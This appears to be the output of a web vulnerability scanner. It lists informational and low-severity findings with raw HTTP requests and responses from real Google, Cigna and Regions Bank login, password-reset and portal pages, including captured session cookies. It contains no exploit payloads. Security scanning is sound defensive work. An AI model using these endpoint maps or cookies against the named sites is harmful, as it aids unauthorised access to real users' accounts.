| GET /verify/EAAAALnVVncD Host: id.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com Cookie: SNID=47=IcQivqrsQQyy | 
| HTTP/1.1 200 OK Set-Cookie: SNID=47=9MV86JLCC9Gh Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Mon, 16 May 2011 16:24:02 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://id.google.com | 
| Path: | /verify/EAAAAMEFFrXi | 
| GET /verify/EAAAAMEFFrXi Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=47=rmeNxjSpRiyo | 
| HTTP/1.1 200 OK Set-Cookie: SNID=47=GlnzvSoFIw0V Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Mon, 16 May 2011 14:45:16 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/forgotid | 
| GET /web/public/forgotid HTTP/1.1 Host: my.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:24 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 18768 ibm-web2-location: /web/public/forgotid/!ut cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: TLTSID=6B62B67A7FD11 Set-Cookie: TLTUID=6B62B67A7FD11 Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_eb751ba4-4b84 Content-Length: 18773 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/forgotpa | 
| GET /web/public/forgotpa Host: my.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:28 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 12125 ibm-web2-location: /web/public/forgotpa cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: TLTSID=6DC2518C7FD11 Set-Cookie: TLTUID=6DC2518C7FD11 Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_d1425c42-4b84 Content-Length: 12130 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/guest | 
| POST /web/public/guest HTTP/1.1 Host: my.cigna.com Connection: keep-alive Referer: http://www.mycigna.com/ Cache-Control: max-age=0 Origin: http://www.mycigna.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:21 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 22481 ibm-web2-location: /web/public/guest/!ut/p cache-control: private, max-age=60 expires: Mon, 16 May 2011 15:31:21 GMT Set-Cookie: TLTSID=698A01C87FD11 Set-Cookie: TLTUID=698A01C87FD11 Set-Cookie: PD_STATEFUL_ccb88d86-4b84 Content-Length: 22491 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secure.regio | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: secure.regionsmortgage Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 404 Not Found ntCoent-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:30:26 GMT Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq Set-Cookie: rfaft2c1=3drGKRGPiL8l Set-Cookie: rfaft2c1_.regionsmortgage X-Expires-Orig: None Cache-Control: max-age=3, must-revalidate, private Cache-Control: private Set-Cookie: NSC_tfdvsf.sfhjpotnp Content-Length: 1635 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | / | 
| GET / HTTP/1.1 Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:19 GMT Content-length: 261 Content-type: text/html Set-Cookie: TLTHID=8C93EE5E7FD11 Set-Cookie: TLTSID=73F9C9687FD11 Etag: "f2e32241-1-0-105" Last-modified: Sun, 17 Jul 2005 20:01:07 GMT Accept-ranges: bytes <HTML> <HEAD> <META Http-Equiv="Cache-Control <META Http-Equiv="Pragma" Content="no-cache"> <META Http-Equiv="Expires" Content="0"> <META HTTP-EQUIV="Refresh" Content="0 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images | 
| GET /corp/sso/images Host: sso.corp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:39 GMT Content-length: 4668 Content-type: image/gif Set-Cookie: TLTHID=989F512A7FD11 Etag: "62a2347d-1-0-123c" Last-modified: Mon, 19 Jan 2004 19:08:58 GMT Accept-ranges: bytes GIF89a..:.......D........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/arrow | 
| GET /corp/sso/images/arrow Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "ef1cee75-1-0-3d" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA16587FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/cigna | 
| GET /corp/sso/images/cigna Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "38eba70c-1-0-9ae" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA4F9C7FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/header | 
| GET /corp/sso/images/header Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "7e42fb94-3-0-48c" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4A7E0907FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/header | 
| GET /corp/sso/images/header Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:42 GMT Content-length: 1858 Content-type: image/gif Set-Cookie: TLTHID=76094A447FD11 Etag: "50bef55a-8-0-742" Last-modified: Sat, 10 Jan 2004 21:45:32 GMT Accept-ranges: bytes GIF89a..........k..7..... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/pshim | 
| GET /corp/sso/images/pshim Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "4c740010-1-0-327" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4A7FF807FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images | 
| GET /corp/sso/images Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "8bbd1376-1-0-c0f" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA13387FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/yahoo | 
| GET /corp/sso/images/yahoo Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "c45c439f-1-0-65" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA49AC7FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/includes/portal | 
| GET /corp/sso/includes/portal Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 If-None-Match: "4ceaf758-1-0-a3d" Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:27:33 GMT Set-Cookie: TLTHID=67A13BF87FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/professional | 
| GET /corp/sso/professional Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:39 GMT Content-type: text/html;charset=ISO Set-Cookie: TLTHID=741A6F2E7FD11 Set-Cookie: TLTSID=741A6F2E7FD11 Content-language: en Set-cookie: JSESSIONID=0001aplKy Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>CIGNAaccess.com - Forgotten Password - Enter User Name</title> <link rel="ST ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: sso.corp.cigna.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:46 GMT Content-length: 318 Content-type: image/x-icon Set-Cookie: TLTHID=78D4C8B67FD11 ..............(.......(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://va.px.invitemedia | 
| Path: | /pixel | 
| GET /pixel?key=segment Host: va.px.invitemedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://s7.addthis.com Cookie: segments_p1="eJzjYuF | 
| HTTP/1.1 302 Found Date: Mon, 16 May 2011 17:09:13 GMT Set-Cookie: segments_p1="eJzjYuF Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Cache-Control: no-cache Location: http://ad.yieldmanager Content-Length: 0 Connection: close Server: Jetty(7.3.1.v20110307) | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /corp/sso/ci/selfsvc | 
| GET /corp/sso/ci/selfsvc Host: cignaforhcp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 302 Found content-language: en-US content-type: text/html date: Mon, 16 May 2011 15:31:34 GMT location: https://cignaforhcp.cigna p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 0 cache-control: no-cache,no-store,max-age expires: Thu, 01 Jan 1970 00:00:00 GMT pragma: No-cache Set-Cookie: JSESSIONID=0000WJAfB Set-Cookie: PD_STATEFUL_335ffd0e-289d Content-Length: 0 | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /corp/sso/ci/selfsvc | 
| GET /corp/sso/ci/selfsvc Host: cignaforhcp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 302 Found content-language: en-US content-type: text/html date: Mon, 16 May 2011 15:31:39 GMT location: https://cignaforhcp.cigna p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 0 cache-control: no-cache,no-store,max-age expires: Thu, 01 Jan 1970 00:00:00 GMT pragma: No-cache Set-Cookie: JSESSIONID=0000-q2wF Set-Cookie: PD_STATEFUL_335ffd0e-289d Content-Length: 0 | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /wps/portal | 
| POST /wps/portal HTTP/1.1 Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna Cache-Control: max-age=0 Origin: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:31:34 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 20913 ibm-web2-location: /wps/portal/!ut/p/c5/04 cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID_CHCP Set-Cookie: PD_STATEFUL_31b6dc34-289d Content-Length: 20575 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" xmlns="http://www.w3.org/ ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Cui-Bytes: 1087 X-TeaLeaf-Page-Cui-Events X-TeaLeaf-Page-Dwell: 5810339 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: BeforeUnload X-TeaLeaf-Page-Url: /web/public/guest Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTUID=6C99367C7FD11 Content-Length: 266 <ClientEventSet PostTimeStamp="13055 ...[SNIP]... | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 17:07:36 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 107 surrogate-control: no-store cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_2af57d96-4b85 Content-Length: 107 ... <html> <body> Response <hr> Read 266 bytes in 1ms. </body> </html> | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/forgotid | 
| GET /web/public/forgotid HTTP/1.1 Host: my.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:24 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 18768 ibm-web2-location: /web/public/forgotid/!ut cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: TLTSID=6B62B67A7FD11 Set-Cookie: TLTUID=6B62B67A7FD11 Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_eb751ba4-4b84 Content-Length: 18773 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/forgotpa | 
| GET /web/public/forgotpa Host: my.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:28 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 12125 ibm-web2-location: /web/public/forgotpa cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: TLTSID=6DC2518C7FD11 Set-Cookie: TLTUID=6DC2518C7FD11 Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_d1425c42-4b84 Content-Length: 12130 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://securebank | 
| Path: | /ForgottenPassword.aspx | 
| GET /ForgottenPassword.aspx HTTP/1.1 Host: securebank.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 15873 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Regions Online Banking</title> <link href="styles/styles. ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://securebank | 
| Path: | /login.aspx | 
| POST /login.aspx?brand=regions HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://www.regions.com Cache-Control: max-age=0 Origin: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 110 ignore=&locationZipCode | 
| HTTP/1.1 301 Moved Set-Cookie: securebank.regions.com Date: Mon, 16 May 2011 15:20:12 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: https://securebank Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html Content-Length: 0 | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/professional | 
| GET /corp/sso/professional Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
